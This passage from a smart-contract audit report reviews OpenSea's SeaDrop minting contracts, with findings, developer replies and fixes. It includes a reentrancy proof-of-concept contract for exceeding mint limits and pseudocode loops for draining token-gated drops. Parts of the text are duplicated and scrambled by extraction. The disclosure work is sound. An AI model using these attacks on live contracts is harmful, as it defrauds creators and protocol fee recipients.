        uint80 minMintPrice;
        uint24 maxMaxTotalMintableByWallet;
        uint48 minStartTime;
        uint48 maxEndTime;
        uint40 maxMaxTokenSupplyForStage;
        uint16 maxFeeBps;
    }

and always assume restrictFeeRecipients == true. Spearbit: That could work. If this solution is implemented, all the instances of mintParams. would need to be replaced by the stored (storage) parameters in this function. Also, a question comes up as to who would have the authority to set SignedMintParams based on the current architecture. Is there a reason you didn't include dropStageIndex in the SignedMintParams struct? In the above SignedMintParams struct, the last field is named maxFeeBps. Was that intentional, or did you mean to name it feeBps? OpenSea: dropStageIndex is purely informational for metrics purposes as part of the SeaDropMint event (we want to be able to see which addresses redeem allow-lists at which stage, etc). In the case of SignedMintParams, the Owner would set it, though for partnered drops, the fee-setting pattern would likely be the same as elsewhere (pending confirmation from legal): OpenSea would initialize a signer with a maxFeeBps (which still requires trust that we don't set it to a higher-than-agreed-upon value), and the Owner can then submit the rest of the parameters. maxFeeBps would allow a variable feeBps--which is probably a rare use-case, but was a requirement from product for allow-list tiers, which we applied to the other mint methods. Enforcing a maxFeeBps, of course, includes the caveat that it would not prevent a malicious signer from always specifying the maximum fee rate. The Owner should specify maxFeeBps to ensure that a signer cannot specify a feeBps larger than the largest acceptable feeBps. (The signer would be free to specify a lower feeBps, which I'm sure a creator would appreciate.) In the general case, if the Owner changes an allowed signer's maxFeeBps (or any other mint parameter) to a value that is no longer acceptable, the signer can refuse to sign mints.
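A sketch of how the validation-params idea from finding 5.1.1 could be enforced at mint time (the struct fields come from the discussion above; the mapping layout, function name, and require strings are assumptions, and MintParams is SeaDrop's existing struct):

    // Bounds stored per (nftContract, signer) instead of a simple allowed bool.
    mapping(address => mapping(address => SignedMintParams)) private _signedMintParams;

    function _validateSignedMintParams(MintParams memory p, SignedMintParams memory v) internal pure {
        require(p.mintPrice >= v.minMintPrice, "mint price below signer minimum");
        require(p.maxTotalMintableByWallet <= v.maxMaxTotalMintableByWallet, "wallet limit too high");
        require(p.startTime >= v.minStartTime && p.endTime <= v.maxEndTime, "time window out of bounds");
        require(p.maxTokenSupplyForStage <= v.maxMaxTokenSupplyForStage, "stage supply too high");
        require(p.feeBps <= v.maxFeeBps, "feeBps above signer maximum");
        require(p.restrictFeeRecipients, "fee recipients must be restricted");
    }

With this in place, a signature over out-of-bounds parameters simply fails validation at mint time, regardless of what the signer signed.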
Therefore, the owner can allow an address they control as a signer and sign mints that have either one of the above features. OpenSea: This is correct; currently any signer would have ultimate control around the parameters of a mint, and this should be understood by parties who wish to use a centralized signer, ie, self-hosted or in a legal agreement with a marketplace However, we could make it slightly less "trustful" by storing a struct of validation params rather than a simple bool in the mapping struct SignedMintParams { uint80 minMintPrice; uint24 maxMaxTotalMintableByWallet; uint48 minStartTime; uint48 maxEndTime; uint40 maxMaxTokenSupplyForStage; uint16 maxFeeBps; } and always assume restrictFeeRecipients == true. Spearbit: That could work. If this solution is implemented, all the instances of mintParams. would need to be replaced by the stored (storage) parameters in this function. Also, a question comes up as to who would have the authority to set SignedMintParams based on the current architecture. Is there a reason you didn't include dropStageIndex in the SignedMintParams struct? In the above SignedMintParams struct, the last field is named maxFeeBps. Was that intentional or did you meant to name it feeBps? OpenSea dropStageIndex is purely informational for metrics-purposes as part of the SeaDropMint event (we want to be able to see which addresses redeem allow-lists at which stage, etc) In the case of SignedMintParams, the Owner would set it, though for partnered drops, the fee-setting pattern would (Pending confirmation from legal) OpenSea would initialize a signer with a likely be the same as elsewhere. maxFeeBps (which still requires trust that we don't set it to a higher-than-agreed-upon value), and the Owner can then submit the rest of the parameters. maxFeeBps would allow variable feeBps - which is probably a rare use-case, but was a requirement from product for allow-list tiers, which we applied to the other mint methods. Enforcing a maxFeeBps, of course, includes the caveat that it would not prevent a malicious signer from always specifying the maximum fee rate. The Owner should specify maxFeeBps to ensure that a signer cannot specify a feeBps larger than the largest acceptable feeBps. (The signer would be free to specify a lower feeBps, which I'm sure a creator would appreciate) 5 In the general case, if the Owner changes an allowed signer's maxFeeBps (or any other mint parameter) to a value that is no longer acceptable, the signer can refuse to sign mints. +5.1.2 ERC721SeaDrop's modifier onlyOwnerOrAdministrator would allow either the owner or the admin to override the other person's config parameters. Severity: High Risk Context: • ERC721SeaDrop.sol#L106, • ERC721SeaDrop.sol#L212, • ERC721SeaDrop.sol#L289, • ERC721SeaDrop.sol#L345 Description: The following 4 external functions in ERC721SeaDrop have the onlyOwnerOrAdministrator modifier which allows either one to override the other person's work. • updateAllowedSeaDrop • updateAllowList • updateDropURI • updateSigner That means there should be some sort of off-chain trust established between these 2 entities. Otherwise, there are possible vectors of attack. Here is an example of how the owner can override AllowListData.merkleRoot and the other fields within AllowListData to generate proofs for any allowed SeaDrop's mintAllowList endpoint that would have MintParams.feeBps equal to 0: 1. 
1. The admin calls updateAllowList for an allowed SeaDrop implementation to set the Merkle root for this contract and emit the other parameters as logs. The SeaDrop endpoint being called by ERC721SeaDrop.updateAllowList: SeaDrop.sol#L827.
2. The owner calls updateAllowList, but this time with new parameters, specifically a new Merkle root that is computed from leaves that have MintParams.feeBps == 0.
3. Users/minters use the generated proof corresponding to the latest allow list update and pass their mintParams.feeBps as 0, thus avoiding the protocol fee deduction for the creatorPaymentAddress (SeaDrop.sol#L187-L194).
Recommendation: Only use this implementation of IERC721SeaDrop if there is already a legal off-chain contract and level of trust between the different parties. Otherwise, a different implementation with a stricter separation of roles is recommended. OpenSea: This is related to specific legal/BD requirements--we need to be able to administer the contract for Partners (some may choose to administer it themselves), but for legal clarity, they also need to unambiguously be the "owner" of the contract, in that they have the power to administer it as well. In practice, in this implementation of the contract, both parties should be considered trusted, but also ideally shouldn't have privileges that overstep their bounds (in particular, fee and creator payouts). This contract is intended to be used as the basis for our first few partnered primary mints. As such, there are some assumptions and particular tailored logic to meet our and our partners' needs. (In hindsight, it might have made more sense to split out into a more-generic ERC721SeaDrop and a more-specific ERC721PartnerSeaDrop.) Assumptions:
• OpenSea will be collecting a fee.
• There is a good deal of trust (i.e., legal contracts) established between the two parties.
• Some Partners will prefer (or require) us to configure drop mechanics and metadata. – This is why some functions are onlyOwnerOrAdministrator.
Requirements, passed down from legal:
• OpenSea is the "Administrator".
• The Partner is the "Owner".
• The Partner is the only entity in control of the pricing of the general drop and the creator payout address.
• OpenSea is the only entity that can update fees and fee recipients.
You are correct that this requires trust between the two parties. As mentioned elsewhere, in general, an administrator will not be necessary for all token contracts. In practice, a marketplace (OpenSea) will have to decide whether or not to provide a proof for a mint transaction depending on the allowed fee recipients and specified feeBps off-chain. Spearbit: Acknowledged.

+5.1.3 Reentrancy of fee payment can be used to circumvent max mints per wallet check Severity: High Risk Context: SeaDrop.sol#L586 Description: In the case of a mintPublic call, the function _checkMintQuantity checks whether the minter has exceeded the parameter maxMintsPerWallet, among other things. However, reentrancy in the fee dispersal mechanism described above can be used to circumvent the check. The following is an example contract that can be employed by the feeRecipient (assume that maxMintsPerWallet is 1):

    contract MaliciousRecipient {
        bool public startAttack;
        address public token;
        SeaDrop public seaDrop;

        fallback() external payable {
            if (startAttack) {
                startAttack = false;
                seaDrop.mintPublic{value: 1 ether}({
                    nftContract: token,
                    feeRecipient: address(this),
                    minterIfNotPayer: address(this),
                    quantity: 1
                });
            }
        }

        // Call `attack` with at least 2 ether.
        function attack(SeaDrop _seaDrop, address _token) external payable {
            token = _token;
            seaDrop = _seaDrop;
            startAttack = true;
            _seaDrop.mintPublic{value: 1 ether}({
                nftContract: _token,
                feeRecipient: address(this),
                minterIfNotPayer: address(this),
                quantity: 1
            });
            token = address(0);
            seaDrop = SeaDrop(address(0));
        }
    }

This is especially bad when the parameter PublicDrop.restrictFeeRecipients is set to false, in which case anyone can circumvent the max mints check, making it a high severity issue. In the other case, only privileged users, i.e., those in the _allowedFeeRecipients[nftContract] mapping, would be able to circumvent the check--lower severity due to the needed privileged access. Also, creatorPaymentAddress can use reentrancy to get around the same check. See SeaDrop.sol#L571. Recommendation: There are two ways to fix the above issue: 1. Code paths that disperse the ETH as fees should have reentrancy locks set. 2. Change safeTransferETH to use .transfer, which only forwards the "call stipend" amount of gas to the sub-call. This may break some smart contract wallets' ability to receive the ETH. OpenSea: Added reentrancy lock (+ test), and (before this commit) mint was re-arranged to be before payment. See commit 160c034. Spearbit: Acknowledged.

5.2 Medium Risk

+5.2.1 Cross SeaDrop reentrancy Severity: Medium Risk Context: SeaDrop.sol#L586 Description: A contract that implements IERC721SeaDrop can work with multiple SeaDrop implementations, for example, a SeaDrop that accepts ETH as payment as well as another SeaDrop contract that accepts USDC as payment at the same time. This introduces the risk of cross-contract reentrancy that can be used to circumvent the maxMintsPerWallet check. Here's an example of the attack:
1. Consider an ERC721 token that has two allowed SeaDrops, one that accepts ETH as payment and the other that accepts USDC as payment, both with public mints and restrictedFeeRecipients set to false.
2. Let maxMintPerWallet be 1 for both these cases.
3. A malicious fee receiver can now do the following:
• Call mintPublic for the SeaDrop with ETH fees, which does the _checkMintQuantity check and transfers the fees in ETH to the receiver.
• The receiver now calls mintPublic for the SeaDrop with USDC fees, which does the _checkMintQuantity check that still passes.
• The mint succeeds in the SeaDrop-USDC case.
• The mint succeeds in the SeaDrop-ETH case.
• The minter has 2 NFTs even though it's capped at 1.
Even if a reentrancy lock is added in the SeaDrop, the same issue persists, as it only enters each SeaDrop contract once. Recommendation: Consider adding a reentrancy lock in the ERC-721 contract. Also see the related issue "Reentrancy of fee payment can be used to circumvent max mints per wallet check" about reentrancy.

+5.2.2 Lack of replay protection for mintAllowList and mintSigned Severity: Medium Risk Context: SeaDrop.sol#L227, SeaDrop.sol#L318
Description: In the case of mintSigned (minting via signatures) and mintAllowList (minting via merkle proofs), there are no checks that prevent re-using the same signature or Merkle proof multiple times. This is indirectly enforced by the _checkMintQuantity function that checks the mint statistics using IERC721SeaDrop(nftContract).getMintStats(minter), reverting if the quantity and the mint statistics exceed maxMintsPerWallet. Replays can happen if a wallet does not claim all of maxMintsPerWallet in one transaction. For example, assume that maxMintsPerWallet is set to 2. A user can call mintSigned with a valid signature and quantity = 1 twice. Typically, contracts try to avoid any form of signature replay, i.e., a signature can only be used once. This simplifies the security properties. In the current implementation of the ERC721SeaDrop contract, we couldn't see a way to exploit replay protection to mint beyond what could be minted in a single initial transaction with the maximum value of quantity supplied. However, this relies on the contract correctly implementing IERC721SeaDrop.getMintStats. Recommendation: We recommend implementing replay protection for both cases. Here are some ideas to do this:
1. Consider also including the tokenId in the signature and passing that along in the mintSeaDrop call. This way, even if the signature is replayed, minting the same tokenId should not be possible--most ERC-721 libraries prevent this. However, some care should be taken to check the following case: mint a fixed token id using the signature, then burn the token id, and resurrect the same token id by replaying the signature.
2. Consider storing the digest; once a digest has been used, it shouldn't be usable again (a sketch follows after this finding).
3. Do not use signatures as a way to check if something was consumed. They are malleable.
OpenSea: We discussed replay protection here, and decided it was a more or less acceptable risk for the following reasons:
1. Allow-lists, which also use _checkMintQuantity, are likewise not redeemed, so Merkle proofs can be re-used in the same way, up to the maximum mint quantity.
2. Also like allow-lists, the supplied MintParams specify a startTime and endTime; a signature can supply a short window (minutes) for consumption before a new signature needs to be generated.
3. A broken _checkMintQuantity or unreasonably large maxTokensMintable quantity is likely (though not always) exploitable the first time a signature (or Merkle proof) is used.
However! Riffing off of the tokenId suggestion (we don't think it's possible to know exactly which starting token ID a given tx will mint): since we're already checking minterNumMinted, we could include that as part of the signature to prevent re-use. Spearbit: 2. A malicious user can always get around the startTime and endTime limits using some automation. 3. We think that most ERC-721 contracts would assume that OpenSea would handle the signature verification and replay protection--the burden of the sale mechanism should be on the SeaDrop contract. Also, this requires the ERC-721 contract to keep track of the number of tokens minted by an address. ERC721A tracks this, but neither Solmate nor OpenZeppelin does currently. We'd expect some user errors because of this problem.
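A minimal sketch of idea 2 from the recommendation above (mapping and error names are assumptions):

    // Record each signed-mint digest the first time it is redeemed.
    mapping(bytes32 => bool) private _usedDigests;

    error SignatureAlreadyUsed(bytes32 digest);

    function _checkAndRecordDigest(bytes32 digest) internal {
        if (_usedDigests[digest]) revert SignatureAlreadyUsed(digest);
        _usedDigests[digest] = true;
    }

Note that this makes a signature strictly single-use, so a signature authorizing quantity = 2 could no longer be redeemed as two separate quantity = 1 mints.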
// hashStruct for mintParams bytes32 mintParamsHashStruct = keccak256( abi.encode( _MINT_PARAMS_TYPEHASH, mintParams.mintPrice, mintParams.maxTotalMintableByWallet, mintParams.startTime, mintParams.endTime, mintParams.dropStageIndex, mintParams.maxTokenSupplyForStage, mintParams.feeBps, 10 mintParams.restrictFeeRecipients ) ); bytes32 digest = keccak256( abi.encodePacked( // EIP-191: `0x19` as set prefix, `0x01` as version byte bytes2(0x1901), _domainSeparator(), keccak256( abi.encode( _SIGNED_MINT_TYPEHASH, nftContract, minter, feeRecipient, mintParamsHashStruct // <--- correction ) ) ) ); This wasn't caught in the test because the test re-uses the same digest calculation. It would be nice to also test it against an external EIP-712 signature calculation. OpenSea: Thanks, digest was fixed and ethers EIP-712 signTypedData has been used to verify in added unit tests here and here. Spearbit: Acknowledged. +5.2.4 Token gated drops with a self-allowed ERC721SeaDrop or a variant of that can lead to the drop getting drained by one person. Severity: Medium Risk Context: SeaDrop.sol#L345 Description: There are scenarios where an actor with only 1 token from an allowed NFT can drain Token Gated Drops that are happening simultaneously or back to back. • Scenario 1 - An ERC721SeaDrop is registered as an allowedNftToken for itself This is a simple example where an ERC721SeaDrop N is registered by the owner or the admin as an allowedNftTo- ken for its own token gated drop and during or before this drop (let's call this drop D) there is another token gated drop ( D0 ) for another allowedNftToken N 0, which does not need to be necessarily an IERC721SeaDrop token. Here is how an actor can drain the self-registered token gated drop: 1. The actor already owns or buys an N 0 token t 0 with wallet w0. 2. During D0, the actor mints an N token t0 with wallet w0 passing N 0, t 0 to mintAllowedTokenHolder and transfer t0 to another wallet if necessary to avoid the max mint per wallet limit (call this wallet w1 which could still be w0). 3. Once D starts or if it is already started, the actor mints another N token t1 with w1 passing N, t0 to mintAl- lowedTokenHolder and transfers t1 to another wallet if necessary to avoid the max mint per wallet limit (call this wallet w2 which could still be w1) 4. Repeat step 3 with the new parameters till we hit the maxTokenSupplyForStage limit for D. 11 # during token gated drop D' t = seaDrop.mintAllowedTokenHolder(N, f, w, {N', [t']}) # during token gated drop D while ( have not reached maxTokenSupplyForStage ): if ( w has reached max token per wallet ): w' = newWallet() N.transfer(w, w', t) w = w' t = seaDrop.mintAllowedTokenHolder(N, f, w, {N, [t]}) • Scenario 2 - Two ERC721SeaDrop tokens are doing a simultaneous token gated drop promotion In this scenario, there are 2 ERC721SeaDrop tokens N1, N2 where they are running simultaneous token gated drop promotions. Each is allowing a wallet/bag holder from the other token to mint a token from their project. So if you have an N1 token you can mint an N2 token and vice versa. Now if an actor already has an N1 or N2 token maybe from another token gated drop or from an allow list mint, they can drain these 2 drops till one of them hits maxTokenSupplyForStage limit. 
    # wallet already holds token from N1
    while ( have not reached N1.maxTokenSupplyForStage or N2.maxTokenSupplyForStage ):
        w = newWalletIfMaxMintReached(N1, w, t) # this also transfers t to the new wallet
        w = newWalletIfMaxMintReached(N2, w, t) # this also transfers t to the new wallet
        t = seaDrop.mintAllowedTokenHolder(N2, f, w, {N1, [t]})
        t = seaDrop.mintAllowedTokenHolder(N1, f, w, {N2, [t]})

This scenario can be extended to more complex systems, but the core logic stays the same. Also, it's good to note that in general maxTotalMintableByWallet for token gated drops and maxMintsPerWallet for public mints are not fully enforceable, since actors can distribute their allowed tokens between multiple wallets to mint to their full potential for the token gated drops. And for public mints, they would just use different wallets. It does add extra gas for them to mint, since they can't batch mint. That said, these limits are enforceable for the signed and allowed mints (or you could say the enforcement has been moved to some off-chain mechanism). OpenSea: In scenario 1, I think a check against allowing a token to register itself as an allowed token-gated-drop is reasonable. In scenario 2, we could also check against allowing a token to register a second token as an allowed-token-gated-drop if that token's currentSupply < maxSupply and it has the first token registered as its own token-gated drop. This has the caveat that a token could implement itself to have a changeable maxSupply, which would bypass these checks... open to other implementation ideas. I think both cases should be documented in the comments. Spearbit: Agree with OpenSea regarding a check for a self-allowed token gated drop in scenario 1. For scenario 2, or a more complex variant of it like (can be even more complex than below):

    // N1, N2: IERC721SeaDrop tokens with token gated drop promotions
    // Each arrow in the diagram below represents an allowed mint mechanism
    // A -> B : a person with a t_a token from A can mint a token of B (B can potentially mark t_a as redeemed on mint)
    M0 -> N1 -> M1 -> M2 -> ... -> Mk -> N2 -> O1 -> O2 -> ... -> Oj -> N1

it would be hard to have an implementation that would check for these kinds of behaviors. But we agree that documenting these scenarios in the comments would be great. OpenSea: Added error TokenGatedDropAllowedNftTokenCannotBeDropToken() and added comments for scenario no. 2. See commit 0a91de9.
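A sketch of the scenario-1 guard (the error name is taken from the resolution commit; placing the check in SeaDrop.updateTokenGatedDrop, where the drop token is msg.sender, is an assumption):

    function updateTokenGatedDrop(address allowedNftToken, TokenGatedDropStage calldata dropStage) external {
        // A token gated drop may not use its own drop token as the allowed token.
        if (allowedNftToken == msg.sender) {
            revert TokenGatedDropAllowedNftTokenCannotBeDropToken();
        }
        // ... store or remove the drop stage as before
    }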
We have added a restraint that maxSupply cannot be set to greater than 264 (cid:0) 1 so balance nor number minted can exceed this. See the commit 5a98d29. +5.2.6 ERC721SeaDrop owner can choose an address they control as the admin when the constructor is called. Severity: Medium Risk Context: ERC721SeaDrop.sol#L83 Description: The owner/creator can call the contract directly (skip using the UI) and set the administrator as themselves or another address that they can control. Then after they create a PublicDrop or TokenGatedDrop, they can call either updatePublicDropFee or updateTokenGatedDropFee and set the feeBps to • zero • or another number and also call the updateAllowedFeeRecipient to add the same or another address they control as a feeRecipient. This way they can circumvent the protocol fee. Recommendation: Consider implementing the following suggestions • Not list NFT contracts on the marketplace site that have an administrator who is not in an internal allowed list. • Or let each allowed SeaDrop implementation's admin/operator to set the admins for the ERC721SeaDrop contract. Although, this can still be possibly rigged by a custom hand-craftedd contract that pretends to be an ERC721SeaDrop contract. • SeaDrop can have its own set of admins independent of the IERC721SeaDrop tokens. These admins should be able to set the feeRecipients and feeBps on SeaDrop without interacting with the original token. OpenSea: In practice, this particular implementation will be deployed by OpenSea or a trusted Partner. In general, an Administrator is not required of ERC721SeaDrop contracts; OpenSea will ingest events and data, and then selectively decide which mints to surface and fulfill, depending on mint parameters. In other words, more generally, it's up to an individual marketplace to decide which mints they are willing to list and fulfill, and that decision making happens off-chain Spearbit: I guess the listing and fulfillment on the OpenSea side is just about the OpenSea marketplace UI. But for example, other aggregators that listen to events from OpenSea deployed SeaDrops can/could list these 13 ERC721SeaDrop on their marketplace. And obviously, users can still interact with the OpenSea deployed SeaDrops directly. +5.2.7 ERC721SeaDrop's admin would need to set feeBps manually after/before creation of each drop by the owner Severity: Medium Risk Context: ERC721SeaDrop.sol#L180, ERC721SeaDrop.sol#L256 Description: When an owner of a ERC721SeaDrop token creates either a public or a token gated drop by calling updatePublicDrop or updateTokenGatedDrop, the PublicDrop.feeBps/TokenGatedDropStage.feeBps is initially set to 0. So the admin would need to set the feeBps parameter at some point (before or after). Forgetting to set this parameter results in not receiving the protocol fees. Recommendation: There are mutiple ways to mitigate this: 1. The admin monitors the activities on-chain and if it sees a newly created drop, calls either updatePublic- DropFee or updateTokenGatedDropFee (depending on the type of the drop) to set the feeBps. 2. Enforcing that both updatePublicDrop and updatePublicDropFee (or updateTokenGatedDrop and update- TokenGatedDropFee) be called by the owner and the admin before a drop can start. The enforcement can be either on the ERC721SeaDrop side or on the SeaDrop side. Also, there could be a flag set by the admin to waive the protocol fee. 
+5.2.8 owner can reset feeBps set by admin for token gated drops Severity: Medium Risk Context: ERC721SeaDrop.sol#L233-L245, SeaDrop.sol#L860, SeaDrop.sol#L889-L890 Description: Only the admin can call updateTokenGatedDropFee to update feeBps. However, the owner can call updateTokenGatedDrop(address seaDropImpl, address allowedNftToken, TokenGatedDropStage calldata dropStage) twice after that to reset the feeBps to 0 for a drop: 1. Once with dropStage.maxTotalMintableByWallet equal to 0 to wipe out the storage on the SeaDrop side. 2. Then with the same allowedNftToken address and the other desired parameters, which would recreate the previously wiped out drop stage data (with feeBps equal to 0). NOTE: This type of attack does not apply to the updatePublicDrop and updatePublicDropFee pair, since updatePublicDrop cannot remove or update the feeBps. Once updatePublicDropFee is called with a specific feeBps, that value remains in this ERC721SeaDrop contract's related storage on SeaDrop (_publicDrops[msg.sender] = publicDrop), and any number of consecutive calls to updatePublicDrop with any parameters cannot change the already set feeBps. Recommendation: The admins could monitor all the activities for updateTokenGatedDrop calls, even when the same old allowedNftToken is used, and make sure to set the fees after each call if it is not a removal kind. OpenSea: We can re-work it so that updateTokenGatedDropFee "initializes" a tokenGatedDrop stage (all params 0 besides feeBps and restrictFeeRecipients), and a partner is free to then edit other params and delete the stage, but not create a new one. I believe that would be a workaround for the current issues. Proposed workaround: Administrator/OpenSea is the only authorized user that can "initialize" a TokenGatedDrop. Initializing a token-gated drop sets all params to zero except maxTotalMintableByWallet = 1 (the struct will not be stored if == 0), feeBps, and restrictFeeRecipients = true. The parameter startTime = 0 means the stage will not be active, and cannot be made active by OpenSea. The Owner/Partner can then update the initialized TokenGatedDrop stage (potentially including deleting it, if so desired, but it would then need to be re-initialized with a fee by OpenSea).

5.3 Low Risk

+5.3.1 Update the start token id for ERC721SeaDrop to 1 Severity: Low Risk Context: ERC721SeaDrop.sol#L144 Description: ERC721SeaDrop's mintSeaDrop uses _mint from the ERC721A library, which starts the token ids for minting from 0.

    /// contracts/ERC721A.sol#L154-L156
    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

Recommendation: Usually 0 is used to signal values that have not been set or have been removed, ... . To avoid possible future problems, consider using a different starting token id by overriding _startTokenId in ERC721SeaDrop. OpenSea: We can configure it to start at 1 as a QOL improvement. Fixed in commit e14fa17. Spearbit: Acknowledged.

+5.3.2 Update the ERC721A library due to an unpadded toString() function Severity: Low Risk Context: ERC721SeaDrop.sol#L14, chiru-labs/ERC721A/contracts/ERC721A.sol#L1049 Description: The audit repo uses ERC721A at dca00fffdc8978ef517fa2bb6a5a776b544c002a, which does not add trailing zero padding to the returned string. Some projects have had issues reusing toString() where the off-chain call returned some dirty bits at the end (similar to Seaport 1.0's name()).
Recommendation: Consider upgrading to a version of ERC721A with that fix; even then, testing it would be prudent. Ref: PR: Add trailing zeros padding to _toString

OpenSea: Fixed in commit 8441e94.

Spearbit: Acknowledged.

+5.3.3 Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case

Severity: Low Risk

Context: SeaDrop.sol#L620

Description: There are no checks in SeaDrop that prevent minting in the case when quantity == 0. This would call the function mintSeaDrop(minter, quantity) on a contract implementing IERC721SeaDrop with quantity == 0. It is up to the implementing contract to revert in such cases. The ERC721A library reverts when quantity == 0, which is the correct behaviour. However, there have been instances in the past where ignoring quantity == 0 checks has led to security issues.

Recommendation: There are two ways to fix this:
1. SeaDrop reverts early when quantity == 0. This is never a valid input. As a reference, Seaport avoids any transfers of 0 amount. See TokenTransferrerErrors.sol#L18.
2. Warn contracts implementing IERC721SeaDrop to revert in the quantity == 0 case.

OpenSea: We have added error MintQuantityCannotBeZero to _checkMintQuantity in the commit 69f2854.

Spearbit: Acknowledged.

+5.3.4 Missing parameter in _SIGNED_MINT_TYPEHASH

Severity: Low Risk

Context: SeaDrop.sol#L78, lib/SeaDropStructs.sol#L92

Description: A parameter (uint256 maxTokenSupplyForStage) is missing; this was caught after reformatting.

Recommendation: Reformat these lines into:

    bytes32 internal immutable _SIGNED_MINT_TYPEHASH =
        keccak256(
            "SignedMint("
                "address nftContract,"
                "address minter,"
                "address feeRecipient,"
                "MintParams mintParams"
            ")"
            "MintParams("
                "uint256 mintPrice,"
                "uint256 maxTotalMintableByWallet,"
                "uint256 startTime,"
                "uint256 endTime,"
                "uint256 dropStageIndex,"
                "uint256 maxTokenSupplyForStage," // <--- missing in the audit repo
                "uint256 feeBps,"
                "bool restrictFeeRecipients"
            ")"
        );
    bytes32 internal immutable _EIP_712_DOMAIN_TYPEHASH =
        keccak256(
            "EIP712Domain("
                "string name,"
                "string version,"
                "uint256 chainId,"
                "address verifyingContract"
            ")"
        );

+5.3.5 Missing address(0) check

Severity: Low Risk

Context: SeaDrop.sol#L856, SeaDrop.sol#L907-L909, SeaDrop.sol#L927-L929, SeaDrop.sol#L966-L968, ERC721SeaDrop.sol#L245

Description: All update functions taking an address as an argument check it against address(0). This check is missing in updateTokenGatedDrop. This is also not protected in ERC721SeaDrop.sol#updateTokenGatedDrop(), so address(0) could pass as a valid value.

Recommendation: Consider adding address(0) checks for allowedNftToken.

OpenSea: Fixed in commit 13deff0.

Spearbit: Acknowledged.

+5.3.6 Missing boundary checks on feeBps

Severity: Low Risk

Context:
• ERC721SeaDrop.sol#L167,
• ERC721SeaDrop.sol#L192,
• ERC721SeaDrop.sol#L241,
• ERC721SeaDrop.sol#L272,
• SeaDrop.sol#L554-L557

Description: There is a missing check when setting feeBps from ERC721SeaDrop.sol, while one exists when the value is used at a later stage in SeaDrop.sol, which could cause an InvalidFeeBps error.

Recommendation: Consider adding the following checks before setting feeBps at the mentioned places in ERC721SeaDrop.sol:

    // Revert if the fee basis points is greater than 10_000.
    if (feeBps > 10_000) {
        revert InvalidFeeBps(feeBps);
    }

OpenSea: We have added this to SeaDrop itself on updatePublicDrop and updateTokenGatedDrop. See commit 246e1d4.

Spearbit: Acknowledged.
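A minimal sketch combining the input validation recommended in 5.3.5 and 5.3.6 above (the wrapper contract and function names are illustrative, not SeaDrop's actual code):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.11;

    /// Illustrative sketch only: validate inputs before storing them, as
    /// recommended in 5.3.5 (address(0) check) and 5.3.6 (feeBps bounds).
    abstract contract TokenGatedDropInputValidation {
        error AllowedNftTokenCannotBeZeroAddress();
        error InvalidFeeBps(uint256 feeBps);

        function _validateTokenGatedDropInputs(
            address allowedNftToken,
            uint256 feeBps
        ) internal pure {
            // Revert if the allowed NFT token is the zero address.
            if (allowedNftToken == address(0)) {
                revert AllowedNftTokenCannotBeZeroAddress();
            }
            // Revert if the fee basis points is greater than 10_000.
            if (feeBps > 10_000) {
                revert InvalidFeeBps(feeBps);
            }
        }
    }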
+5.3.7 Upgrade openzeppelin/contracts's version

Severity: Low Risk

Context: SeaDrop.sol#L318

Description: There are known vulnerabilities in the current @openzeppelin/contracts version used. This affects SeaDrop.sol with a potential Improper Verification of Cryptographic Signature vulnerability, as ECDSA.recover is used.

Recommendation: Consider upgrading to @openzeppelin/contracts@4.7.3.

OpenSea: Fixed in commit d279548.

Spearbit: Acknowledged.

+5.3.8 struct TokenGatedDropStage is expected to fit into 1 storage slot

Severity: Low Risk

Context: SeaDropStructs.sol#L32-L61, SeaDrop.sol#L871-L876

Description: struct TokenGatedDropStage is expected to be tightly packed into 1 storage slot, as announced in its @notice tag. However, the struct actually takes 2 slots. This is unexpected, as only one slot is loaded in the dropStageExists assembly check.

Recommendation: Consider changing maxTokenSupplyForStage to uint32 to fit into 1 slot:

      struct TokenGatedDropStage {
          uint80 mintPrice; // 80/256 bits
          uint16 maxTotalMintableByWallet;
          uint48 startTime;
          uint48 endTime;
          uint8 dropStageIndex; // non-zero
    -     uint40 maxTokenSupplyForStage;
    +     uint32 maxTokenSupplyForStage;
          uint16 feeBps;
          bool restrictFeeRecipients;
      }

5.4 Gas Optimization

+5.4.1 Avoid expensive iterations on removal of list elements by providing the index of element to be removed

Severity: Gas Optimization

Context: SeaDrop.sol#L1004

Description: Iterating through an array (address[] storage enumeration) to find the desired element (address toRemove) can be an expensive operation. Instead, it would be best to also provide the index to be removed along with the other parameters, to avoid looping over all elements. Note that in the case of _removeFromEnumeration(signer, enumeratedStorage) there will hopefully not be too many signers corresponding to a contract, so in practice this would not be an issue. However, the owner or admin can stuff the signer list with a lot of signers, as the other party would not be able to remove them from the list (a DoS attack). For example, if the owner has stuffed the signer list with malicious signers, the admin would not be able to remove them.

Recommendation: One way to simplify the removal process would be by providing the index. As an example:

    function _removeFromEnumeration(
        address toRemove,
        address[] storage enumeration,
        uint index
    ) internal {
        require(enumeration[index] == toRemove);
        // Do the actual removing; no loops needed.

The index needs to be computed off-chain before sending the transaction.

+5.4.2 mintParams.allowedNftToken should be cached

Severity: Gas Optimization

Context: SeaDrop.sol#L345-L436

Description: mintParams.allowedNftToken is accessed several times in the mintAllowedTokenHolder function. It would be cheaper to cache it:

    // Put the allowedNftToken on the stack for more efficient access.
    address allowedNftToken = mintParams.allowedNftToken;

Recommendation: Consider the following diff:

    +   // Put the allowedNftToken on the stack for more efficient access.
    +   address allowedNftToken = mintParams.allowedNftToken;
    +
        // Set the dropStage to a variable.
        TokenGatedDropStage memory dropStage = _tokenGatedDrops[nftContract][
    -       mintParams.allowedNftToken
    +       allowedNftToken
        ];

        ...
        // Check that the sender is the owner of the allowedNftTokenId.
        if (
    -       IERC721(mintParams.allowedNftToken).ownerOf(tokenId) != minter
    +       IERC721(allowedNftToken).ownerOf(tokenId) != minter
        ) {
            revert TokenGatedNotTokenOwner(
                nftContract,
    -           mintParams.allowedNftToken,
    +           allowedNftToken,
                tokenId
            );
        }

        // Check that the token id has not already been redeemed.
        if (
    -       _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][
    +       _tokenGatedRedeemed[nftContract][allowedNftToken][
                tokenId
            ] == true
        ) {
            revert TokenGatedTokenIdAlreadyRedeemed(
                nftContract,
    -           mintParams.allowedNftToken,
    +           allowedNftToken,
                tokenId
            );
        }

        // Mark the token id as redeemed.
    -   _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][
    +   _tokenGatedRedeemed[nftContract][allowedNftToken][

OpenSea: Added in commit 48823a3.

Spearbit: Acknowledged.

